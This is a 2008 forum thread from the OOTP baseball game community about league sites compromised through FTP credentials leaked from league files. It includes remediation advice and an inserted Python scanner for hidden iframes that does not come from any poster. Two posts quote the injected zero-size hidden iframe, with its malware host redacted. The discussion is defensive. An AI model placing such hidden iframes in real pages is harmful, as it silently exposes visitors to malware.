Old 12-04-2008, 07:11 AM   #1
Andreas Raht
Administrator
 
 
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
OOTP Online League Security Problem

Attention, online league commissioners! A security issue has been discovered in the online league dat files. The dat files contain the league server's FTP access information, and if a hacker finds the username and password he could easily access your web space and do all kinds of malicious things.

We will release a patched version very soon where the FTP information contained in the dat files is encrypted. It's currently in beta testing.
However, you know that each encryption can be hacked, so we strongly suggest that you hide your league files! Only GMs should have access to the league files. There should be no (public) link to the league file anywhere on your web space. That's easy to do and it will keep away the evildoers.

The perfect solution for the league file problem would be an extra subdomain on your web space where PHP/CGI/Perl/ASP is turned OFF and which has an extra FTP account that can only access that subdomain folder.

Please, all commissioners, do the following ASAP:

--- Change the FTP password of the web site which the GMs used for the online leagues NOW (i.e. the password which has been entered in OOTP). The password must be replaced with another one IMMEDIATELY! If you cannot do that or if you don't know how to do that, you have to ask the admin of the web server, i.e. your ISP (Internet Service Provider) who hosts your web space.

--- Move the league file to a different place on your web server where NOBODY CAN FIND IT. Only the GMs may know the address of the league file! Nobody else should be able to find it. You could just rename the league file or move it to another folder. In OOTP 2007/8/9 there is an option to set the name of the league file. Just set it to, for example, myLeague_ahsfkas89df.tar.gz and nobody will find it except your GMs, who will get the link to the file from you.

--- Remove the link to the league file from your homepage! Many online leagues publish the link on their web page for convenience, but you should no longer do that!

--- Message board software and CMS (Content Management System like Joomla) software used for the online league web sites should be updated whenever updates are available. Hackers find new security holes in that kind of software frequently, simply because they have the source code of the software.

We apologise for any inconvenience!!

Please also have a look at these threads:

http://www.ootpdevelopments.com/boar...e-leagues.html

http://www.ootpdevelopments.com/boar...ty-notice.html
Old 12-04-2008, 09:05 PM   #2
Officespace99
Minors (Double A)
 
Join Date: Nov 2002
Location: Northern Virginia
Posts: 164
Can we get a confirmation as to whether this affects OOTP 8, since a large % of leagues are still on this version?
__________________
Current Leagues:
(All years in "game" years)
NOBL - Boston Red Sox (2002-present)
NOBL - Commish (2006 - present)
TTWB - Farmingdale Frunkus (2011 - present)

My OOTP graveyard:
LLM - Yucatan Leones (2012 - folded)
CPL - Detroit Tigers (2011 - folded)
FHBL -Cincinnati Reds (2006 - folded)
Maverick Baseball - Boston Red Sox (2005 - folded)
BPLA - Portland (2004: folded)
Old 12-04-2008, 09:30 PM   #3
Bristolduke
All Star Starter
 
Join Date: May 2006
Posts: 1,404
The answer is yes. It is in the referenced thread. They are working on patches for 2007 and 8.
__________________
Commish of the Home Nations Baseball Association
Commish of the Baseball Association League
Commish of the League of WAR
Commish of the On-Line Dynasty League
SIMBL2 - Westbury Cannons
Great Lakes Baseball - Toledo Neptunes
World Baseball - Guantanamo Marines
OMLB - Cincinnati Reds
Old 12-05-2008, 12:57 AM   #4
f.montoya
Hall Of Famer
 
 
Join Date: Nov 2004
Posts: 6,069
I just found this in the index.html from an OOTP 6 online league I host...

Code:
<html>
<head>
<title>OOTP 6 Generated Website</title>
</head>
<frameset rows="100,*" frameborder="0" framespacing="0" border="0">
  <frame name="Banner" scrolling="no" noresize target="Inhalt" src="top.html">
  <frameset cols="100,*">
    <frame name="menu" target="Hauptframe" src="menu.html">
    <frame name="content" src="league.html">
  </frameset>
  <noframes>
  <body><(SPACE HERE) ****** src="http://badsitehere" style="width: 0px; height: 0px; display: none"><(SPACE HERE)  /******>
  <p>Diese Seite verwendet Frames. Frames werden von Ihrem Browser aber nicht
  unterstützt.</p>
  </body>
  </noframes>
</frameset>
</html>
OOTP 6 & 6.5 must have the same hole. Don't have time to check right now, but we need an emergency patch for 6 and 6.5 too, Andreas.
__________________
Fidel Montoya

Asahi2 Baseball ex-Commissioner(Historical League Since 2004)
www.allsimbaseball.com (OOTP web hosting - Customized sites for online leagues - Sign up, Connect OOTP and Play!)
Share Your Mods - Free, unlimited and easy to upload to share your Mods instantly(free site registration required)

Last edited by f.montoya; 12-17-2008 at 07:17 AM.
Old 12-05-2008, 03:47 AM   #5
Andreas Raht
Administrator
 
 
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
Quote:
Originally Posted by Bristolduke View Post
The answer is yes. It is in the referenced thread. They are working on patches for 2007 and 8.
Sorry, that must be a misunderstanding!

Quote:
Originally Posted by f.montoya View Post
OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.
Unfortunately we cannot patch 6.5 and OOTP 2007 for several reasons. We'll not release patches for the older versions and to be honest: it would not make much sense because if we encrypted the FTP password in the dat file it could still be hacked!
In OOTP 6.5 everything was encrypted, and obviously it has been hacked, too. We could improve the encryption, but it will also be hacked sooner or later.
See, obviously somebody wrote some code to hack OOTP Online leagues. He has to find and download the league file, extract the FTP info, log in to the site and do his dirty job. Lots of work actually, and there are not as many online leagues on the web as for example vBulletin message boards or Joomla web sites, so I don't know why the evildoer does that. There is only one explanation: we have an enemy out there. He cracked the first encryption and he will also crack the next one. No, encryption is not the solution.
We have to change the whole process, and until we have done that, the commissioners can do it on their own:

- hide the league files! Only your GMs may know where it is!
- use an extra FTP account for the folder to which the league files are uploaded!
- change your FTP password NOW!

We are sorry that this happened. We will improve OOTP and we will change the online league upload/download process. But the GMs can simply change the process now by hiding the league file and that will do much more than improving the encryption.
Old 12-05-2008, 04:04 AM   #6
Markus Heinsohn
Developer OOTP
 
 
Join Date: Dec 2001
Location: Germany
Posts: 24,738
Andreas is right. Please follow his guidelines!
Old 12-05-2008, 04:59 AM   #7
kq76
Global Moderator
 
 
Join Date: Nov 2002
Location: Vancouver, Canada
Posts: 10,697
After the commish changes the league's ftp info everyone in the league will have to be sent a link to download and install the league files manually instead of being able to update through the game because their copy of the game won't be able to ftp yet, right?
Old 12-05-2008, 05:19 AM   #8
Tony M
Global Moderator
 
 
Join Date: Feb 2006
Location: Here
Posts: 6,156
Blog Entries: 3
Quote:
Originally Posted by kq76 View Post
After the commish changes the league's ftp info everyone in the league will have to be sent a link to download and install the league files manually instead of being able to update through the game because their copy of the game won't be able to ftp yet, right?
Correct, because the FTP details they have in their game will be wrong.
Old 12-05-2008, 09:20 AM   #9
SMFXR01
All Star Starter
 
 
Join Date: Jan 2007
Posts: 1,196
Am I right in assuming that version 9.2.7 should not be used and we should wait for 9.2.9?

I am getting an error when I switch from an Online League to a Solo League.

( UTILITY_FUNCTIONS::get_decrypted_string-invalid source string )

I assume this has to do with identifying the difference between an Online League and a Non Online League.

Last edited by SMFXR01; 12-05-2008 at 09:54 AM.
Old 12-06-2008, 02:20 PM   #10
Treches
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Quote:
Originally Posted by f.montoya View Post
I just found this in the index.html from an OOTP 6 online league I host...
xxx
OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.
First, remove the address of the ****** from your post. It's a malware site.
Second, while the ftp pw can certainly be obtained from the league file without much hassle, I doubt we are dealing with a cracker doing things manually here. Obviously, the ****** hack is appearing because the ftp pw is leaked, but it is a program that is inserting them (into all those files named "index" or "main") via a trojan on the user side. And it doesn't matter what you do if the trojan isn't removed from the machine, because that software (MPack, most likely) cycles and runs non-stop. The trojan is sending the cracker the ftp pw; if you change it but don't erase the trojan, he gets the new pw and you get the ****** code again. He may have targeted OOTP leagues, but websites have been infected by the ****** in the thousands since 2007, from CBS to Auntie Mildred's cooking forums.

Usually, it goes like this: this bot signs up on the forums (maybe several times); uses a valid email account and writes down a website address in its profile. Joe Curious notices the new guy on board and clicks to check that website. This one, of course, is a malware site, and the moment Joe Curious gets there his firewall and web browser are checked for security loopholes, and if he has them, the trojan is d/l'ed and installed automatically. The trojan is a keylogger that sends the cracker all sorts of pw, mainly ftp's. Thus, the moment you change the pw, he gets it. The ****** gets inserted in the code and redirects your page to the malware site, thus infecting those who have security loopholes (mostly everyone whose firewall does not block the redirection).

Things to do here are:
1. Scan your machine for malware. Keep in mind that the trojan may block the anti-malware, so you might want to online scan (trend micro, for example) and/or install the anti-malware (a-squared, malware bytes, etc.) on a pen drive and scan the pc from there and remove the trojan.

2. Once you have your machine cleaned, take a close look at all the files you have on your site, erasing those you don't recognize.

3. Change your main ftp pw.

4. Create a ftp user and pw with permission to access just the folder where OOTP exports are located. That's the one you have to type down within the game, not the main ftp id and pw.

5. Rename your "index" pages (at least, your frontpage) to a different name (yourleague.html, for example).

6. Authorize every new registration on your forums.

7. Get yourself a malware shield.

8. Make sure that your web browser is not allowed to d/l anything automatically.

9. Pray that the trojan is not located on the server side, because then your best move is transferring your site to another one.
__________________
The Computer Baseball League

Last edited by Treches; 12-06-2008 at 02:27 PM.
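Step 2 of the checklist above (reviewing the files on the site) can be partly automated. The following is an added example, not code from any poster or from OOTP: it scans a local copy of the web space for iframes hidden the way the snippet quoted in this thread is (zero size or `display: none`). The suffix list, the function names and the placeholder host are assumptions.

```python
import re
import sys
from pathlib import Path

SCAN_SUFFIXES = {".html", ".htm", ".php"}  # assumption: page types the site serves
# Regex over raw text on purpose: injected markup can sit inside <noframes> or
# next to PHP, where an HTML parser may not report it as a tag.
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+)""")
TINY = re.compile(r"^[01](px)?$", re.I)  # 0, 1, 0px, 1px

def parse_attrs(attr_text):
    """Attribute text of one start tag -> {lower-cased name: unquoted value}."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR.findall(attr_text)}

def hidden_reasons(attrs):
    """Return why an iframe is invisible to a visitor, or [] if it is visible."""
    css = {}
    for decl in attrs.get("style", "").split(";"):
        if ":" in decl:
            prop, value = decl.split(":", 1)
            css[prop.strip().lower()] = value.strip().lower()
    reasons = []
    if css.get("display") == "none":
        reasons.append("display:none")
    if css.get("visibility") == "hidden":
        reasons.append("visibility:hidden")
    for dim in ("width", "height"):
        if TINY.match(css.get(dim, "")) or TINY.match(attrs.get(dim, "").strip()):
            reasons.append(dim + "<=1px")
    return reasons

def scan_text(text):
    """Return [(line, src, reasons)] for every hidden iframe in one file's text."""
    hits = []
    for m in IFRAME_TAG.finditer(text):
        attrs = parse_attrs(m.group(1))
        reasons = hidden_reasons(attrs)
        if reasons:
            hits.append((text.count("\n", 0, m.start()) + 1, attrs.get("src", ""), reasons))
    return hits

def scan_webroot(root):
    """Walk a local copy of the web space; return [(path, line, src, reasons)]."""
    root, findings = Path(root), []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            for hit in scan_text(text):
                findings.append((path.relative_to(root).as_posix(),) + hit)
    return findings

# Constructed sample modelled on the posted snippet; injected.example is a placeholder host.
SAMPLE = ('<noframes>\n<body><iframe src="http://injected.example/" '
          'style="width: 0px; height: 0px; display: none"></iframe>\n</body></noframes>\n')

if __name__ == "__main__":
    print(scan_webroot(sys.argv[1]) if len(sys.argv) > 1 else scan_text(SAMPLE))
```

Run it against a downloaded copy of the site (path as the first argument); a visible iframe with normal dimensions is not reported, so legitimate embedded pages do not raise findings.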
Old 12-06-2008, 03:14 PM   #11
gollum65
All Star Reserve
 
Join Date: Feb 2007
Posts: 925
You may be right about it being a trojan, but if that's the case we all have the same trojan. I know of at least 6 sites that were hacked multiple times in the last month or so, using the same method, including my own site which was hacked 4 times. Regardless of how the guy is getting the info, he's getting it and is apparently going after multiple OOTP sites.
Old 12-06-2008, 04:05 PM   #12
Treches
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
It's the same type of trojan and he/they is/are going after all kinds of sites because he/they is/are getting paid by the hit. The ****** not only gets inserted in the code but also erases other crackers' iframes. Mpack goes by $800, so we are not dealing with kids fooling around here.
__________________
The Computer Baseball League
Old 12-20-2008, 08:59 PM   #13
Chappy
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

This was inserted in both our forums index.php file and our wordpress index.php file:
Code:
<****** src="evil site" style="width: 0px; height: 0px; display: none"></******>
Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???
__________________
NPBL - Pennsylvania Freedom
AFBL - North Carolina Aviators
MLB-Pro - Kansas City Royals

Last edited by Chappy; 12-21-2008 at 01:44 PM.
Old 12-21-2008, 12:30 AM   #14
kq76
Global Moderator
 
 
Join Date: Nov 2002
Location: Vancouver, Canada
Posts: 10,697
Quote:
Originally Posted by Chappy View Post
Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

This was inserted in both our forums index.php file and our wordpress index.php file: <snip> Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???
Is your forum and blog software up-to-date?

Whatever it is, once you correct it, you'll probably want to change the passwords and locations again.
Old 12-21-2008, 07:26 AM   #15
Treches
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Quote:
Originally Posted by Chappy View Post
Hey guys...


The NPBL patched, changed passwords, removed links to files and moved file location back when this thread came out.

And today we were hacked. The Jamaica League was also hacked.

Do I need to change everything again, and will it even matter if I DO since I've already done all that since the patch???
Read:

Quote:
Originally Posted by Treches View Post
Molarmite,

I posted step-by-step instructions on Andreas' thread to fix the issue.

Read what Alan T has written down because that's exactly what's happening to you. You (or whoever has access to your site) have a keylogger trojan on your machine that's sending the ftp pw to the hacker. Until the trojan is removed it's pointless to change the pw, 'cause the moment you change it he gets it. Then a piece of software called Mpack inserts the ****** that redirects your "index" or "main" pages to a malware site. Mpack cycles and runs non-stop as long as it has the pw. Thus, you can clean up the code today but will get the ****** again next week.
__________________
The Computer Baseball League
Old 12-21-2008, 07:29 AM   #16
Treches
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
And read:

Quote:
Originally Posted by Treches View Post
"That said, I continue to see that the hacker is also placing iframes directly into the league reports as well. So I'm afraid that even a restricted FTP account for the game will not stop this cycle."
--
Correct. Restricted FTP accounts (say the one you place on the downloadable league file) are just to avoid the casual cracker from fooling around, but restrictions don't block Mpack, as it will gain access to the root nevertheless, bypassing the permissions. The only way to block it is erasing the trojan on the user side and then, and only then, changing the pw.
Thus, the patch does nothing if you have the trojan on board.
__________________
The Computer Baseball League
Old 12-21-2008, 07:36 AM   #17
Chappy
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
So...

Would changing all the info and running a couple of sims from an alternate PC be a good idea?
__________________
NPBL - Pennsylvania Freedom
AFBL - North Carolina Aviators
MLB-Pro - Kansas City Royals
Old 12-21-2008, 07:40 AM   #18
Treches
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
If you use an alternate PC you're safe if a) It's clean, and b) Has a fresh ftp password. In any case, I'd recommend you to focus on removing the keylogger trojan from whomever has it.
__________________
The Computer Baseball League
Old 12-21-2008, 07:42 AM   #19
Treches
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Damned Hell
Posts: 2,147
Also, remove the ****** link from your post.
__________________
The Computer Baseball League
Old 12-23-2008, 09:09 AM   #20
Chappy
Hall Of Famer
 
 
Join Date: Dec 2001
Location: Raleigh, NC
Posts: 2,721
Treches,

Thanks for the replies. I appreciate the help...

However, I'm convinced that there is not a keylogger trojan on my machine. I've swept it now with 3 different products (including the Trend Micro one you recommended) and found nothing.
__________________
NPBL - Pennsylvania Freedom
AFBL - North Carolina Aviators
MLB-Pro - Kansas City Royals